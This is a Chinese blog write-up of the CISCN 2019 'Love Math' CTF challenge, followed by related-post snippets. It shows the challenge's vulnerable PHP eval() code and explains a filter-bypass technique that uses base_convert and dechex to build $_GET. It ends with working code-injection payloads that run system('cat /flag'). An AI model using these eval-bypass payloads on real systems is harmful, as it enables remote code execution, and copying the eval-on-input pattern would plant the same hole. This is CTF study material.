[CISCN 2019 初赛]Love Math

最新推荐文章于 2024-09-07 16:53:09 发布
最新推荐文章于 2024-09-07 16:53:09 发布
阅读量28 收藏
点赞数
文章标签: 网络安全 web安全 计算机网络 安全威胁分析 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wp568/article/details/132510200
版权 
<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

一、题目分析

代码审计发现:

1、字长不能大于80 ,可以通过把payload存在变量里来绕过

2、黑名单,过滤了空格 换行符 单双引号,反引号 斜杠 中括号等,

中括号使用{}花括号代替
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];

3、设置了白名单,你的变量名必须使用这里边的函数名或者是数字。

使用到的函数:

base_convert()函数

2到36进制之间的任意转换。

dechex()函数

dechex() 函数把十进制数转换为十六进制数。

hex2bin() 函数

hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。

二、解题

构造目标:

c=system("cat /flag")

1、绕过函数和引号的限制

c=($_GET[a])($_GET[b])&a=system&b=cat /flag

2、构造 _GET

hex2bin函数不在白名单内不能直接用,hex2bin 在字母表中最靠后的字符为x,这意味着我们可以把它当作一个36进制数 使用在线进制转换得到hex2bin作为一个36进制数的对应十进制数,再用base_convert 函数进行转换:

base_convert(37907361743,10,36)

把_GET字符串转十六进制数,再用进制转换工具转换为10进制 放入dechex函数:

(dechex(1598506324))

得到:

base_convert(37907361743,10,36)(dechex(1598506324));//即为_GET

为了不让结果太长,需要用一个白名单变量来保存上述值,最好用最短的pi

3、根据 $_GET[a]($_GET[b])&a=system&b=cat /flag 构建payload:

c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag

c的长度刚好为79

也可以不使用白名单里的函数做名字,使用数字:

/?c=1;${1}=base_convert(37907361743,10,36)(dechex(1598506324));$${1}{2}($${1}{3})&2=system&3=cat /flag

半两八金
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[CISCN2019 初赛]Love Math
qq_42551635的博客
05-07 412
[CISCN2019 初赛]Love Math 前言 一道非常有意思的,逻辑比较简单的代码审计 知识点 base_convert()函数 in_array()函数 in_array(值,数组) 函数搜索数组中是否存在指定的值。 实例 <?php $people = array("Peter", "Joe", "Glenn", "Cleveland", 23); if (in_array("23", $people, TRUE)) { echo "Match found<br&
[CISCN 2019 初赛]Love Math 1
qq_53460654的博客
05-28 601
打开环境 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t',
[CISCN 2019初赛]Love Math
rev1ve的博客
09-01 1609
简单分析一下,只有一个GET传参参数是c,然后对上传的值进行黑名单检测,接着给了白名单以及常用的数学函数。这个提示很明显了,需要我们用函数进行转换成我们的执行命令。这里最后一个点,就是我们传递的参数值为两个(即一个是函数名 一个是参数),该如何绕过呢。这样的出来,但是这里对我们c的值进行了超多过滤,这里用的是构造出类似。呢,其实目的很明显,因为c的值不能有字母,而我们要想利用。解决方法是用php7的特性,就是可以用变量执行函数。关键点利用php动态函数的特性,比如我们可以构造。,这里需要用到的两个函数是。
CISCN2019初赛 Love Math
Tajang的大千世界
04-11 323
打开靶机 直接给了源码,刚开始没啥思路,看了wp,大致懂了。先介绍一个概念,在PHP中可以把函数名赋给变量,然后通过变量调用函数,比如下面的代码会执行system('ls'); $a='system'; $a('ls'); 我想执行system('cat /flag');那就应该是如下语句 ?c=$_GET[a]($_GET[b])&a=system&b=cat /flag 但是源码限制了许多东西: 1.payload长度不能超过80 2.payload中不能包含’ ‘, ‘\t’,
[CISCN 2019 初赛]Love Math(利用函数和进制转换构造hen2bin函数)
weixin_73399382的博客
07-28 658
又因为限制长度80,我们把base_convert(37907361743,10,36)(dechex(156217328980))赋值给一个变量$sin,即$sin=base_convert(37907361743,10,36)(dechex(156217328980))构造payload:?($$pi){pi}(($$pi){cos})&pi=exec&cos=ls /:这个函数执行外部程序并返回最后一行输出的字符串。($_GET['a'])($_GET['b'])就等于$a$b即exec(ls /)
BUUCTF:[CISCN 2019 初赛]Love Math
qq_46230755的博客
12-27 973
base_convert(37907361743,10,36)得到“hex2bin” dechex(1598506324)得到“5f474554” $pi=hex2bin(5f474554)得到$pi="_GET" ($$pi){pi}(($$pi){abs})=$_GET{pi}($_GET{abs})
buuctf-[CISCN 2019 初赛]Love Math(小宇特详解)
小宇的web博客
02-26 2983
buuctf-[CISCN 2019 初赛]Love Math(小宇特详解) 1.先看题目 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了
CISCN 2019 初赛--Love Math
Oavinci的博客
07-28 609
参考了大佬WP,payload姿势太多了 https://www.cnblogs.com/20175211lyz/p/11588219.html https://blog.csdn.net/weixin_43940853/article/details/104332132 在线进制转换:https://tool.oschina.net/hexconvert 这里写几个自己复现成功的(太菜了我.. 源码,目的是读取flag <html> <meta ch...
[ciscn 2019 初赛]love math
03-16
这道题目需要我们求出一个数列中所有数的最大公约数。我们可以使用欧几里得算法来求解。具体来说,我们可以用辗转相除的方法,不断将两个数中较大的数除以较小的数,直到两个数相等为止,此时的数即为它们的最大公...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8450
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1449
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-06 1532
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
如何启动网络安全计划:首先要做的事情
最新发布
网络研究观
09-07 721
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1667
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
什么是网络安全
网络研究观
09-04 2555
了解不同类型的网络安全和主要形式的网络威胁
网络安全服务基础Windows--第12节-域与活动目录
m0_65771743的博客
09-03 1188
域中的计算机可以共享资源,例如⽂件系统和打印机,⽤户只需在域中进⾏⼀次登录(单点登录),就可以访问其有权限的所有资源。我们在服务器上通过查找⼀个对象可以查到的所有关联信息总和,如⼀个⽤户,如果我们在服务器已给这个⽤户定义了讲如:⽤户名、⽤户密码、⼯作单位、联系电话、家庭住址等,那上⾯所说的总和⼴义上理解就是“⽤户”这个名字的名字空间,因为我们只输⼊⼀个⽤户名即可找到上⾯我所列的⼀切信息。例如,在AD中,域控制器的名称会映射到其在DNS中的记录,以便⽹络中的其他服务和客户端可以找到它。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半两八金

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值